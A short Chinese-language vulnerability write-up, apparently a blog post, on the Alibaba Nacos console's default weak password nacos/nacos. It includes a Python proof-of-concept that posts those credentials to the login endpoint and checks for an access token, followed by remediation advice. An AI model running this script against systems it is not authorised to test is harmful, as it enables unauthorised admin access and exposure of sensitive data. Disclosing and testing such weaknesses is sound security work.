Alibaba Nacos 控制台默认弱口令

漏洞描述

Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息

影响范围

Alibaba Nacos

漏洞复现

发送如下请求:
images
返回200说明成功登录

脚本复现
python3 poc.py https://nacos.taget.com/

#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import json
import sys
import urllib3
urllib3.disable_warnings()
def poc(arg):
vuln_url = arg + 'v1/auth/users/login'
headers = {"User-Agent": "Nacos-Server",
"Content-Type": "application/x-www-form-urlencoded"
}
postdata= "username=nacos&password=nacos"
try:
r = requests.post(vuln_url,headers=headers,verify=False,timeout=20,allow_redirects=False,data=postdata)
if r.status_code == 200 and "accessToken" in r.text:
print('存在漏洞:'+vuln_url)
except Exception as e:
print('出错:'+str(e))
pass
url=sys.argv[1]
poc(url)

修复建议

1、升级最新版本: https://nacos.io/zh-cn/
2、口令8位数以上,包括大小写字符,特殊字母,数字

posted @   KAKSKY  阅读(559)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示